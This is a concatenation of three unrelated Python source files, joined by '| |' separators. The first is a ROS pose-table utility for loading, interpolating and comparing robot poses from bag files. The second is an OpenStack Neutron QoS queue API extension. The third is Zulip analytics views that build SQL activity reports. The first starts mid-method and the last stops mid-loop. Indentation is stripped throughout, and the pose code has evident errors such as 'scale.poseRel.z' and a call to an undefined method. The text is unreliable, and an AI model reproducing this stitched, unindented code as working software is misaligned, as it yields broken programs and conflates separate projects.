candidates = set()
i = 0
for p in range(len(self.table)) :
i = p
cpose = self.table[i]
if (cpose.timestamp > pose.timestamp) :
candidates.add(cpose)
i-=1
break
while i!=0 :
cpose = self.table[i]
i -= 1
candidates.add (cpose)
if (cpose.timestamp < pose.timestamp) :
candidates.add (cpose)
break
if (tolerance>0) :
tcandidates=[]
for c in candidates:
c.tdif = abs(c.timestamp-pose.timestamp)
if c.tdif > tolerance:
pass
else:
tcandidates.append(c)
return sorted (tcandidates, key=lambda pose: pose.tdif)
#return sorted (candidates, key=lambda pose: pose.timestamp)
return min(candidates, key=lambda p: abs(p.timestamp-pose.timestamp))
def findNearPosesByTime (self, srcpose, tolerance=0.1):
if (srcpose.timestamp < self.table[0].timestamp) :
raise KeyError ("Timestamp less than table")
if (srcpose.timestamp > self.table[-1].timestamp) :
raise KeyError ("Timestamp is outside table: " + str(srcpose.timestamp))
nearMin = None
nearMax = None
for p in range(len(self)):
i = p
cpose = self.table[i]
if (cpose.timestamp > srcpose.timestamp):
nearMax = copy(cpose)
break
while i != 0 :
cpose = self.table[i]
i -= 1
if (cpose.timestamp < srcpose.timestamp):
nearMin = copy (cpose)
break
return (nearMin, nearMax)
def interpolateByTime (self, srcpose, tolerance=0.1):
pmin, pmax = self.findNearPosesByTime (srcpose, tolerance)
tRatio = (srcpose.timestamp - pmin.timestamp) / (pmax.timestamp - pmin.timestamp)
# Interpolation of Position
pvmin = pmin.coord()
pvmax = pmax.coord()
posInt = pvmin + tRatio * (pvmax - pvmin)
# Interpolation of orientation
qmin = pmin.quaternion()
qmax = pmax.quaternion()
qInt = trafo.quaternion_slerp(qmin, qmax, tRatio)
return Pose(srcpose.timestamp, posInt[0], posInt[1], posInt[2], \
qInt[0], qInt[1], qInt[2], qInt[3])
def interpolateByProjection (self, srcpose, tolerance=0.1):
pmin, pmax = self.findNearPosesByTime (srcpose, tolerance)
def findNearestInTime (self, timestamp, tolerance=0.1):
candidates = set()
for p in self.table:
tdiff = abs(p.timestamp - timestamp)
if (tdiff < tolerance):
candidates.add(p)
if p.timestamp > timestamp:
break
if (len(candidates)==0):
return None
return min(candidates, key=lambda p: abs(p.timestamp-timestamp))
def findNearestByDistance (self, pose, returnIdx=False, *args):
if (returnIdx==False):
return min(self.table,
key=lambda p:
np.linalg.norm(pose.coord()-p.coord()))
elif (returnIdx==True) :
dist = np.array([np.linalg.norm(pose.coord()-p.coord()) for p in self.table])
return np.argmin(dist)
elif len(args)>0 :
posecoord = np.array([pose, returnIdx, args[0]])
return min(self.table,
key=lambda p:
np.linalg.norm(posecoord-p.coord()))
def last(self):
return self.table[-1]
@staticmethod
def plotMulti (*tables):
pass
def plot (self, col1, col2, **kwargs):
array = self.toArray()
return plt.plot(array[:,col1], array[:,col2], **kwargs)
def plotRange (self, col1, col2, rangeFrom, rangeTo, **kwargs):
array = self.toArray()
return plt.plot(array[rangeFrom:rangeTo, col1], array[rangeFrom:rangeTo, col2], **kwargs)
# Choosing columns: 1->X, 2->Y, 3->Z
def plotTimeToAxis (self, col):
matr = self.toArray(True)
return plt.plot(matr[:,0], matr[:,col])
@staticmethod
def loadCsv (filename):
mat = np.loadtxt(filename)
records = PoseTable ()
for r in mat :
p = Pose (r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7])
records.append (p)
return records
@staticmethod
def loadFromBagFile (filename, sourceFrameName=None, targetFrameName=None) :
bagsrc = rosbag.Bag(filename, mode='r')
#topicInfo = bagsrc.get_type_and_topic_info('/tf')
i = 0
bagRecord = PoseTable ()
# Message timestamp is what recorded by `rosbag record'
# Transform timestamp is what reported by publisher
for topic, msg, msgTimestamp in bagsrc.read_messages('/tf') :
transform = msg.transforms[0].transform
header = msg.transforms[0].header
tfTimestamp = header.stamp
child_frame_id = msg.transforms[0].child_frame_id
if (sourceFrameName!=None and targetFrameName!=None) :
if header.frame_id!=sourceFrameName or child_frame_id!=targetFrameName :
continue
pose = Pose (tfTimestamp.to_sec(),
transform.translation.x, transform.translation.y, transform.translation.z,
transform.rotation.x, transform.rotation.y, transform.rotation.z, transform.rotation.w)
pose.counter = i
pose.msgTimestamp = msgTimestamp.to_sec()
bagRecord[i] = pose
i += 1
return bagRecord
@staticmethod
def loadFromPoseStampedBag (filename, topicName=None):
bagsrc = rosbag.Bag (filename, mode='r')
poseRecord = PoseTable()
for topic, msg, msgTimestamp in bagsrc.read_messages():
if (topicName is not None and topic != topicName):
continue
if (msg._type != 'geometry_msgs/PoseStamped') :
continue
cpose = Pose(msgTimestamp.to_sec(), msg.pose.position.x, msg.pose.position.y, msg.pose.position.z,
msg.pose.orientation.x, msg.pose.orientation.y, msg.pose.orientation.z, msg.pose.orientation.w)
poseRecord.append(cpose)
return poseRecord
@staticmethod
def loadFromArray (msrc):
if (msrc.shape[1] != 8):
raise ValueError ('Source has no timestamp')
# try to sort
msrc = sorted(msrc, key=lambda r: r[0])
table = PoseTable ()
for row in msrc:
pose = Pose(row)
table.append(pose)
return table
@staticmethod
def getFrameList (filename):
bagsrc = rosbag.Bag(filename, mode='r')
frames = {}
for topic, msg, timestamp in bagsrc.read_messages('/tf'):
transform = msg.transforms[0].transform
header = msg.transforms[0].header
child_frame_id = msg.transforms[0].child_frame_id
transformFrame = {'from':header.frame_id, 'to':child_frame_id, 'start':timestamp.to_sec()}
key = header.frame_id+child_frame_id
if (key not in frames):
frames[key] = transformFrame
return frames.values()
# Find all poses in current table that are in range of targetPoses timeframe
def getAllInTimeRanges (self, targetPoses):
matchInTime = PoseTable()
p1 = targetPoses[0]
p2 = targetPoses.last()
for p in self.table:
if p.timestamp >= p1.timestamp and p.timestamp<=p2.timestamp:
matchInTime.append (copy (p))
return matchInTime
@staticmethod
def compareErrorsByTime (poseTbl1, poseTbl2, useZ=True):
"""
poseTbl1 -> for source table
poseTbl2 -> for ground truth
"""
errorVect = []
i=0
for pose in poseTbl1.table:
try:
nearp = poseTbl2.findNearestByTime(pose)
if (useZ):
errv = np.linalg.norm([pose.x-nearp.x, pose.y-nearp.y, pose.z-nearp.z], 2)
else:
errv = np.linalg.norm([pose.x-nearp.x, pose.y-nearp.y], 2)
errorVect.append([pose.timestamp, errv])
i+=1
#if i>=10000:
# break
print ("{} out of {}".format(i, len(poseTbl1)))
except KeyError as e:
print e
return errorVect
@staticmethod
def compareErrorsByDistance (poseTblSource, groundTruth, useZ=True):
errorVect = []
i=0
for pose in poseTblSource.table:
try:
nearp = groundTruth.findNearestByDistance(pose)
if (useZ):
errv = np.linalg.norm([pose.x-nearp.x, pose.y-nearp.y, pose.z-nearp.z], 2)
else:
errv = np.linalg.norm([pose.x-nearp.x, pose.y-nearp.y], 2)
errorVect.append([pose.timestamp, errv])
i+=1
#if i>=10000:
# break
print ("{} out of {}".format(i, len(poseTblSource)))
except KeyError as e:
print e
return errorVect
@staticmethod
def compareLateralErrors (poseTblSource, groundTruth, tolerance=0.15, useZ=False):
i = 0
for pose in poseTblSource.table:
try:
errMeas = pose.measureErrorLateral (groundTruth, tolerance, useZ)
pose.measuredError = errMeas
# errorVect.append ([pose.timestamp, errMeas])
except KeyError as e:
pose.measuredError = -1.0
i += 1
print ("{} out of {}".format(i, len(poseTblSource)))
@staticmethod
# XXX: Unfinished
def removeSpuriousPoints (poseTbl1):
newposetbl = PoseTable()
for pose in poseTbl1.table:
pass
return newposetbl
def findBlankTime(self, timeTolerance=0.5):
blanks = []
for p in range(1, len(self.table)):
cpose = self.table[p]
ppose = self.table[p-1]
if abs(cpose.timestamp - ppose.timestamp) > timeTolerance:
blanks.append([ppose, cpose])
return blanks
def lengthFrom2Pose (self, poseIndex1, poseIndex2):
if (type(poseIndex1)==int):
dist = 0.0
for i in range(poseIndex1+1, poseIndex2+1):
cpose = self.table[i]
ppose = self.table[i-1]
cdist = np.linalg.norm([cpose.x-ppose.x, cpose.y-ppose.y, cpose.z-ppose.z], 2)
dist += cdist
return dist
def lengthFrom2Times(self, time1, time2):
pose1 = self.findNearestInTime(time1, 0.25)
idx1 = self.table.index(pose1)
pose2 = self.findNearestInTime(time2, 0.25)
idx2 = self.table.index(pose2)
return self.lengthFrom2Pose (idx1, idx2)
def subset (self, startIdx, stopIdx):
poseTblSubset = PoseTable()
for i in range(startIdx, stopIdx+1):
p = self.table[i]
poseTblSubset.append(p)
return poseTblSubset
def transform (self, dpose):
pass
def findBlankLengthFromGroundTruth (self, groundTruthTbl):
tolerance = 0.25
blankDistFront = 0
# Find blank distance in front
if groundTruthTbl[0].timestamp < self.table[0].timestamp:
pgrnd = groundTruthTbl.findNearestInTime (self.table[0].timestamp, tolerance)
idx = groundTruthTbl.table.index(pgrnd)
blankDistFront = groundTruthTbl.lengthFrom2Pose (0, idx)
else:
blankDistFront = 0
# Find blank distance in rear
blankDistRear = 0
if (groundTruthTbl.last().timestamp > self.table[-1].timestamp):
pgrnd = groundTruthTbl.findNearestInTime (self.table[-1].timestamp, tolerance)
idx = groundTruthTbl.table.index (pgrnd)
blankDistRear = groundTruthTbl.lengthFrom2Pose (idx, len(groundTruthTbl)-1)
else:
blankDistRear = 0
# Find blank distances in middle
blankPoses = self.findBlankTime(tolerance)
blankDistMid = 0
for bPose in blankPoses:
d = groundTruthTbl.lengthFrom2Times (bPose[0].timestamp, bPose[1].timestamp)
blankDistMid += d
return blankDistFront + blankDistMid + blankDistRear
def saveToBag (self, bagFileName, parentFrame, childFrame, append=False):
from tf2_msgs.msg import TFMessage
from std_msgs.msg import Header
from geometry_msgs.msg import Transform, TransformStamped, Vector3, Quaternion
import rosbag
def create_tf_message (pose):
header = Header (stamp=rospy.Time(pose.timestamp))
tfmsg = TFMessage(transforms = [TransformStamped()])
tfmsg.transforms[0].header = copy(header)
tfmsg.transforms[0].header.frame_id = parentFrame
tfmsg.transforms[0].child_frame_id = childFrame
tfmsg.transforms[0].transform = Transform()
tfmsg.transforms[0].transform.translation = Vector3(pose.x, pose.y, pose.z)
tfmsg.transforms[0].transform.rotation = Quaternion(x=pose.qx, \
y=pose.qy,
z=pose.qz,
w=pose.qw)
return tfmsg
bagfile = None
if (append==False):
bagfile = rosbag.Bag(bagFileName, mode='w')
else :
bagfile = rosbag.Bag(bagFileName, mode='a')
i = 0
for pose in self.table:
tfmsg = create_tf_message(pose)
bagfile.write('/tf', tfmsg, t=rospy.Time.from_sec(pose.msgTimestamp))
print ("{} / {}".format(i, len(self.table)))
i+=1
bagfile.close()
def saveToPoseStampedBag (self, filename, topic, frame, append=False):
bagfile = None
if (append==False) :
bagfile = rosbag.Bag (filename, mode='w')
else:
bagfile = rosbag.Bag (filename, mode='a')
for pose in self.table:
posemsg = PoseStamped()
posemsg.header.frame_id = frame
posemsg.header.stamp = rospy.Time.from_sec(pose.timestamp)
posemsg.pose.position.x = pose.x
posemsg.pose.position.y = pose.y
posemsg.pose.position.z = pose.z
posemsg.pose.orientation.x = pose.qx
posemsg.pose.orientation.y = pose.qy
posemsg.pose.orientation.z = pose.qz
posemsg.pose.orientation.w = pose.qw
bagfile.write(topic, posemsg, t=rospy.Time.from_sec(pose.timestamp))
bagfile.close()
@staticmethod
def loadSegwayStatusFromBag (bagFilename, limitMsg=0) :
segwayPose = PoseTable()
bagsrc = rosbag.Bag(bagFilename, mode='r')
cPose = Pose()
cPose.theta = 0.0
i = 0
for topic, msg, timestamp in bagsrc.read_messages():
try:
if cPose.timestamp == 0:
cPose.timestamp = timestamp.to_sec()
continue
x, y, theta = cPose.segwayMove(timestamp.to_sec(),
msg.segway.left_wheel_velocity,
msg.segway.right_wheel_velocity,
msg.segway.yaw_rate)
cPose.x = x
cPose.y = y
cPose.theta = theta
cPose.timestamp = timestamp.to_sec()
segwayPose.append (copy(cPose))
i += 1
if (limitMsg!=0 and i>=limitMsg):
break
print (i)
except KeyError:
continue
return segwayPose
def increaseTimeResolution (self, numToAdd=10):
NewPoseTable = PoseTable()
for i in range(len(self)-1) :
p1 = self[i]
p2 = self[i+1]
NewPoseTable.append(p1)
rt = 1.0 / float(numToAdd)
j = 0.0
while (j < 1.0) :
j += rt
pnew = Pose.interpolate(p1, p2, j)
NewPoseTable.append(pnew)
NewPoseTable.append(p2)
return NewPoseTable
def joinPoseTables (*poseTbls):
#Find maximum & minimum time
mintimes = [ptb[0].timestamp for ptb in poseTbls]
startTime = min(mintimes)
maxtimes = [ptb.last().timestamp for ptb in poseTbls]
stopTime = max(maxtimes)
# Find optimal time resolution
def timeDiffs (poseTbl) :
diff = []
for p in range(1, len(poseTbl.table)):
cpose = poseTbl.table[p]
ppose = poseTbl.table[p-1]
diff.append(cpose.timestamp - ppose.timestamp)
return diff
poseTblDiffs = [timeDiffs(ptbl) for ptbl in poseTbls]
minDiffs = [min(td) for td in poseTblDiffs]
timeRez = min(minDiffs)
poseList = set()
for ptbl in poseTbls:
for pose in ptbl.table:
pose.parent = ptbl
poseList.add(pose)
allPosesList = sorted(poseList, key=lambda p: p.timestamp)
jointPoses = PoseTable()
for pose in allPosesList:
if pose not in poseList:
continue
cPoses = []
cPoses.append(pose)
for ptbl in poseTbls:
if (pose.parent==ptbl):
continue
friend = ptbl.findNearestInTime(pose.timestamp, 2*timeRez)
if friend != None and friend in poseList:
cPoses.append (friend)
poseAvg = Pose.average(*cPoses)
jointPoses.append(poseAvg)
for p in cPoses:
poseList.discard(p)
# For debugging progress
print ("Length: {} / {}".format(len(jointPoses), len(allPosesList)))
return jointPoses
def OrbFixOffline (orbLocalisationBagFilename, mapCsv):
offset = 1
orbLoc = PoseTable.loadFromBagFile(orbLocalisationBagFilename, 'ORB_SLAM/World', 'ORB_SLAM/Camera')
mapArray = np.loadtxt(mapCsv)
orbMapTbl = np.array([[r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7]] for r in mapArray])
orbMap = PoseTable.loadFromArray(orbMapTbl)
ndtMapTbl = np.array([[r[0],r[8],r[9],r[10],r[11],r[12],r[13],r[14]] for r in mapArray])
ndtMap = PoseTable.loadFromArray(ndtMapTbl)
for loc in orbLoc.table:
loc.kfId = orbMap.findNearestByDistance(loc, True)
loc.kf = orbMap[loc.kfId]
# Fix axes
for pose in orbLoc.table:
x=pose.x
y=pose.y
z=pose.z
pose.x=z
pose.y=-x
pose.z=-y
x=pose.kf.x
y=pose.kf.y
z=pose.kf.z
pose.kf.x=z
pose.kf.y=-x
pose.kf.z=-y
ndtPose = ndtMap[pose.kfId]
ndtPoseOffset = None
try:
ndtPoseOffset = ndtMap[pose.kfId-offset]
kfOffset = orbMap[pose.kfId-offset]
except KeyError:
continue
scale = np.linalg.norm(ndtPose.coord()-ndtPoseOffset.coord()) / \
np.linalg.norm(pose.kf.coord()-kfOffset.coord())
poseRel = Pose(0, ndtPose.x-pose.x, ndtPose.y-pose.y, ndtPose.z-pose.z)
pose.cx = ndtPose.x + scale*poseRel.x
pose.cy = ndtPose.y + scale*poseRel.y
pose.cz = ndtPose.z + scale.poseRel.z
return orbLoc, orbMap, ndtMap
# Custom bag reader class
class BagReader (rosbag.Bag):
def __init__ (self, bagpath, topicname=None):
super(BagReader, self).__init__(bagpath, 'r')
self.rTopicName = topicname
def readByTime (self, second):
rtm = rospy.Time.from_sec(second)
if self.rTopicName is not None:
for topic,msg,time in self.read_messages(topics=self.rTopicName, start_time=rtm):
if msg is None:
raise KeyError("Message not found in that time")
return copy(msg)
def readByCount (self, counter):
pass
def formatResultAsRecords (resultMat):
records = PoseTable()
for r in range(len(resultMat)) :
id = int (resultMat[r][0])
pose = Pose(resultMat[r][1:])
records[id] = pose
return records
def flipOrbToNdt (orbPose):
qOrb = [orbPose.qx, orbPose.qy, orbPose.qz, orbPose.qw]
orbFlip = trafo.concatenate_matrices(
trafo.quaternion_matrix(qOrb),
trafo.rotation_matrix(np.pi/2, (1,0,0)),
trafo.rotation_matrix(np.pi/2, (0,0,1))
)
return trafo.quaternion_from_matrix(orbFlip)
def readMessage (bag, topic, timestamp):
tm = rospy.Time.from_sec(timestamp)
for topic, msg, time in bag.read_messages(topics=topic, start_time=tm):
return msg
if __name__ == '__main__' :
poseBag = PoseTable.loadFromPoseStampedBag("/home/sujiwo/Tsukuba2016/data/nagoya/2016-11-18-14-34-25/pose.bag")
pass
| |
# Copyright 2013 VMware, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import abc
from neutron.api import extensions
from neutron.api.v2 import attributes as attr
from neutron.api.v2 import base
from neutron.common import exceptions as nexception
from neutron import manager
# For policy.json/Auth
qos_queue_create = "create_qos_queue"
qos_queue_delete = "delete_qos_queue"
qos_queue_get = "get_qos_queue"
qos_queue_list = "get_qos_queues"
class DefaultQueueCreateNotAdmin(nexception.InUse):
message = _("Need to be admin in order to create queue called default")
class DefaultQueueAlreadyExists(nexception.InUse):
message = _("Default queue already exists.")
class QueueInvalidDscp(nexception.InvalidInput):
message = _("Invalid value for dscp %(data)s must be integer value"
" between 0 and 63.")
class QueueInvalidMarking(nexception.InvalidInput):
message = _("The qos marking cannot be set to 'trusted' "
"when the DSCP field is set")
class QueueMinGreaterMax(nexception.InvalidInput):
message = _("Invalid bandwidth rate, min greater than max.")
class QueueInvalidBandwidth(nexception.InvalidInput):
message = _("Invalid bandwidth rate, %(data)s must be a non negative"
" integer.")
class QueueNotFound(nexception.NotFound):
message = _("Queue %(id)s does not exist")
class QueueInUseByPort(nexception.InUse):
message = _("Unable to delete queue attached to port.")
class QueuePortBindingNotFound(nexception.NotFound):
message = _("Port is not associated with lqueue")
def convert_to_unsigned_int_or_none(val):
if val is None:
return
try:
val = int(val)
if val < 0:
raise ValueError()
except (ValueError, TypeError):
msg = _("'%s' must be a non negative integer.") % val
raise nexception.InvalidInput(error_message=msg)
return val
def convert_to_unsigned_int_or_none_max_63(val):
val = convert_to_unsigned_int_or_none(val)
if val > 63:
raise QueueInvalidDscp(data=val)
return val
# As per NSX API, if a queue is trusted, DSCP must be omitted; if a queue is
# untrusted, DSCP must be specified. Whichever default values we choose for
# the tuple (qos_marking, dscp), there will be at least one combination of a
# request with conflicting values: for instance given the default values below,
# requests with qos_marking = 'trusted' and the default dscp value will fail.
# In order to avoid API users to explicitly specify a setting for clearing
# the DSCP field when a trusted queue is created, the code serving this API
# will adopt the following behaviour when qos_marking is set to 'trusted':
# - if the DSCP attribute is set to the default value (0), silently drop
# its value
# - if the DSCP attribute is set to anything than 0 (but still a valid DSCP
# value) return a 400 error as qos_marking and DSCP setting conflict.
# TODO(salv-orlando): Evaluate whether it will be possible from a backward
# compatibility perspective to change the default value for DSCP in order to
# avoid this peculiar behaviour
RESOURCE_ATTRIBUTE_MAP = {
'qos_queues': {
'id': {'allow_post': False, 'allow_put': False,
'is_visible': True},
'default': {'allow_post': True, 'allow_put': False,
'convert_to': attr.convert_to_boolean,
'is_visible': True, 'default': False},
'name': {'allow_post': True, 'allow_put': False,
'validate': {'type:string': attr.NAME_MAX_LEN},
'is_visible': True, 'default': ''},
'min': {'allow_post': True, 'allow_put': False,
'is_visible': True, 'default': '0',
'convert_to': convert_to_unsigned_int_or_none},
'max': {'allow_post': True, 'allow_put': False,
'is_visible': True, 'default': None,
'convert_to': convert_to_unsigned_int_or_none},
'qos_marking': {'allow_post': True, 'allow_put': False,
'validate': {'type:values': ['untrusted', 'trusted']},
'default': 'untrusted', 'is_visible': True},
'dscp': {'allow_post': True, 'allow_put': False,
'is_visible': True, 'default': '0',
'convert_to': convert_to_unsigned_int_or_none_max_63},
'tenant_id': {'allow_post': True, 'allow_put': False,
'required_by_policy': True,
'validate': {'type:string': attr.TENANT_ID_MAX_LEN},
'is_visible': True},
},
}
QUEUE = 'queue_id'
RXTX_FACTOR = 'rxtx_factor'
EXTENDED_ATTRIBUTES_2_0 = {
'ports': {
RXTX_FACTOR: {'allow_post': True,
# FIXME(arosen): the plugin currently does not
# implement updating rxtx factor on port.
'allow_put': True,
'is_visible': False,
'default': 1,
'enforce_policy': True,
'convert_to': attr.convert_to_positive_float_or_none},
QUEUE: {'allow_post': False,
'allow_put': False,
'is_visible': True,
'default': False,
'enforce_policy': True}},
'networks': {QUEUE: {'allow_post': True,
'allow_put': True,
'is_visible': True,
'default': False,
'enforce_policy': True}}
}
class Qos(extensions.ExtensionDescriptor):
"""Port Queue extension."""
@classmethod
def get_name(cls):
return "QoS Queue"
@classmethod
def get_alias(cls):
return "qos-queue"
@classmethod
def get_description(cls):
return "NSX QoS extension."
@classmethod
def get_updated(cls):
return "2014-01-01T00:00:00-00:00"
@classmethod
def get_resources(cls):
"""Returns Ext Resources."""
exts = []
plugin = manager.NeutronManager.get_plugin()
resource_name = 'qos_queue'
collection_name = resource_name.replace('_', '-') + "s"
params = RESOURCE_ATTRIBUTE_MAP.get(resource_name + "s", dict())
controller = base.create_resource(collection_name,
resource_name,
plugin, params, allow_bulk=False)
ex = extensions.ResourceExtension(collection_name,
controller)
exts.append(ex)
return exts
def get_extended_resources(self, version):
if version == "2.0":
return dict(EXTENDED_ATTRIBUTES_2_0.items() +
RESOURCE_ATTRIBUTE_MAP.items())
else:
return {}
class QueuePluginBase(object):
@abc.abstractmethod
def create_qos_queue(self, context, queue):
pass
@abc.abstractmethod
def delete_qos_queue(self, context, id):
pass
@abc.abstractmethod
def get_qos_queue(self, context, id, fields=None):
pass
@abc.abstractmethod
def get_qos_queues(self, context, filters=None, fields=None, sorts=None,
limit=None, marker=None, page_reverse=False):
pass
| |
from django.db import connection
from django.template import RequestContext, loader
from django.utils.html import mark_safe
from django.shortcuts import render_to_response
from django.core import urlresolvers
from django.http import HttpResponseNotFound
from zerver.decorator import has_request_variables, REQ, zulip_internal
from zerver.models import get_realm, UserActivity, UserActivityInterval, Realm
from zerver.lib.timestamp import timestamp_to_datetime
from collections import defaultdict
from datetime import datetime, timedelta
import itertools
import time
import re
import pytz
eastern_tz = pytz.timezone('US/Eastern')
def make_table(title, cols, rows, has_row_class=False):
if not has_row_class:
def fix_row(row):
return dict(cells=row, row_class=None)
rows = map(fix_row, rows)
data = dict(title=title, cols=cols, rows=rows)
content = loader.render_to_string(
'analytics/ad_hoc_query.html',
dict(data=data)
)
return content
def dictfetchall(cursor):
"Returns all rows from a cursor as a dict"
desc = cursor.description
return [
dict(zip([col[0] for col in desc], row))
for row in cursor.fetchall()
]
def get_realm_day_counts():
query = '''
select
r.domain,
(now()::date - pub_date::date) age,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
join zerver_client c on c.id = m.sending_client_id
where
(not up.is_bot)
and
pub_date > now()::date - interval '8 day'
and
c.name not in ('zephyr_mirror', 'ZulipMonitoring')
group by
r.domain,
age
order by
r.domain,
age
'''
cursor = connection.cursor()
cursor.execute(query)
rows = dictfetchall(cursor)
cursor.close()
counts = defaultdict(dict)
for row in rows:
counts[row['domain']][row['age']] = row['cnt']
result = {}
for domain in counts:
cnts = [counts[domain].get(age, 0) for age in range(8)]
min_cnt = min(cnts)
max_cnt = max(cnts)
def format_count(cnt):
if cnt == min_cnt:
good_bad = 'bad'
elif cnt == max_cnt:
good_bad = 'good'
else:
good_bad = 'neutral'
return '<td class="number %s">%s</td>' % (good_bad, cnt)
cnts = ''.join(map(format_count, cnts))
result[domain] = dict(cnts=cnts)
return result
def realm_summary_table(realm_minutes):
query = '''
SELECT
realm.domain,
coalesce(user_counts.active_user_count, 0) active_user_count,
coalesce(at_risk_counts.at_risk_count, 0) at_risk_count,
(
SELECT
count(*)
FROM zerver_userprofile up
WHERE up.realm_id = realm.id
AND is_active
AND not is_bot
) user_profile_count,
(
SELECT
count(*)
FROM zerver_userprofile up
WHERE up.realm_id = realm.id
AND is_active
AND is_bot
) bot_count
FROM zerver_realm realm
LEFT OUTER JOIN
(
SELECT
up.realm_id realm_id,
count(distinct(ua.user_profile_id)) active_user_count
FROM zerver_useractivity ua
JOIN zerver_userprofile up
ON up.id = ua.user_profile_id
WHERE
query in (
'/json/send_message',
'send_message_backend',
'/api/v1/send_message',
'/json/update_pointer'
)
AND
last_visit > now() - interval '1 day'
AND
not is_bot
GROUP BY realm_id
) user_counts
ON user_counts.realm_id = realm.id
LEFT OUTER JOIN
(
SELECT
realm_id,
count(*) at_risk_count
FROM (
SELECT
realm.id as realm_id,
up.email
FROM zerver_useractivity ua
JOIN zerver_userprofile up
ON up.id = ua.user_profile_id
JOIN zerver_realm realm
ON realm.id = up.realm_id
WHERE up.is_active
AND (not up.is_bot)
AND
ua.query in (
'/json/send_message',
'send_message_backend',
'/api/v1/send_message',
'/json/update_pointer'
)
GROUP by realm.id, up.email
HAVING max(last_visit) between
now() - interval '7 day' and
now() - interval '1 day'
) as at_risk_users
GROUP BY realm_id
) at_risk_counts
ON at_risk_counts.realm_id = realm.id
WHERE EXISTS (
SELECT *
FROM zerver_useractivity ua
JOIN zerver_userprofile up
ON up.id = ua.user_profile_id
WHERE
query in (
'/json/send_message',
'/api/v1/send_message',
'send_message_backend',
'/json/update_pointer'
)
AND
up.realm_id = realm.id
AND
last_visit > now() - interval '2 week'
)
ORDER BY active_user_count DESC, domain ASC
'''
cursor = connection.cursor()
cursor.execute(query)
rows = dictfetchall(cursor)
cursor.close()
# get messages sent per day
counts = get_realm_day_counts()
for row in rows:
try:
row['history'] = counts[row['domain']]['cnts']
except:
row['history'] = ''
# augment data with realm_minutes
total_hours = 0
for row in rows:
domain = row['domain']
minutes = realm_minutes.get(domain, 0)
hours = minutes / 60.0
total_hours += hours
row['hours'] = str(int(hours))
try:
row['hours_per_user'] = '%.1f' % (hours / row['active_user_count'],)
except:
pass
# formatting
for row in rows:
row['domain'] = realm_activity_link(row['domain'])
# Count active sites
def meets_goal(row):
return row['active_user_count'] >= 5
num_active_sites = len(filter(meets_goal, rows))
# create totals
total_active_user_count = 0
total_user_profile_count = 0
total_bot_count = 0
for row in rows:
total_active_user_count += int(row['active_user_count'])
total_user_profile_count += int(row['user_profile_count'])
total_bot_count += int(row['bot_count'])
rows.append(dict(
domain='Total',
active_user_count=total_active_user_count,
user_profile_count=total_user_profile_count,
bot_count=total_bot_count,
hours=int(total_hours)
))
content = loader.render_to_string(
'analytics/realm_summary_table.html',
dict(rows=rows, num_active_sites=num_active_sites)
)
return content
def user_activity_intervals():
day_end = timestamp_to_datetime(time.time())
day_start = day_end - timedelta(hours=24)
output = "Per-user online duration for the last 24 hours:\n"
total_duration = timedelta(0)
all_intervals = UserActivityInterval.objects.filter(
end__gte=day_start,
start__lte=day_end
).select_related(
'user_profile',
'user_profile__realm'
).only(
'start',
'end',
'user_profile__email',
'user_profile__realm__domain'
).order_by(
'user_profile__realm__domain',
'user_profile__email'
)
by_domain = lambda row: row.user_profile.realm.domain
by_email = lambda row: row.user_profile.email
realm_minutes = {}
for domain, realm_intervals in itertools.groupby(all_intervals, by_domain):
realm_duration = timedelta(0)
output += '<hr>%s\n' % (domain,)
for email, intervals in itertools.groupby(realm_intervals, by_email):
duration = timedelta(0)
for interval in intervals:
start = max(day_start, interval.start)
end = min(day_end, interval.end)
duration += end - start
total_duration += duration
realm_duration += duration
output += " %-*s%s\n" % (37, email, duration, )
realm_minutes[domain] = realm_duration.total_seconds() / 60
output += "\nTotal Duration: %s\n" % (total_duration,)
output += "\nTotal Duration in minutes: %s\n" % (total_duration.total_seconds() / 60.,)
output += "Total Duration amortized to a month: %s" % (total_duration.total_seconds() * 30. / 60.,)
content = mark_safe('<pre>' + output + '</pre>')
return content, realm_minutes
def sent_messages_report(realm):
title = 'Recently sent messages for ' + realm
cols = [
'Date',
'Humans',
'Bots'
]
query = '''
select
series.day::date,
humans.cnt,
bots.cnt
from (
select generate_series(
(now()::date - interval '2 week'),
now()::date,
interval '1 day'
) as day
) as series
left join (
select
pub_date::date pub_date,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
where
r.domain = %s
and
(not up.is_bot)
and
pub_date > now() - interval '2 week'
group by
pub_date::date
order by
pub_date::date
) humans on
series.day = humans.pub_date
left join (
select
pub_date::date pub_date,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
where
r.domain = %s
and
up.is_bot
and
pub_date > now() - interval '2 week'
group by
pub_date::date
order by
pub_date::date
) bots on
series.day = bots.pub_date
'''
cursor = connection.cursor()
cursor.execute(query, [realm, realm])
rows = cursor.fetchall()
cursor.close()
return make_table(title, cols, rows)
def ad_hoc_queries():
def get_page(query, cols, title):
cursor = connection.cursor()
cursor.execute(query)
rows = cursor.fetchall()
rows = map(list, rows)
cursor.close()
def fix_rows(i, fixup_func):
for row in rows:
row[i] = fixup_func(row[i])
for i, col in enumerate(cols):
if col == 'Domain':
fix_rows(i, realm_activity_link)
elif col in ['Last time', 'Last visit']:
fix_rows(i, format_date_for_activity_reports)
content = make_table(title, cols, rows)
return dict(
content=content,
title=title
)
pages = []
###
for mobile_type in ['Android', 'ZulipiOS']:
title = '%s usage' % (mobile_type,)
query = '''
select
realm.domain,
up.id user_id,
client.name,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
client.name like '%s'
group by domain, up.id, client.name
having max(last_visit) > now() - interval '2 week'
order by domain, up.id, client.name
''' % (mobile_type,)
cols = [
'Domain',
'User id',
'Name',
'Hits',
'Last time'
]
pages.append(get_page(query, cols, title))
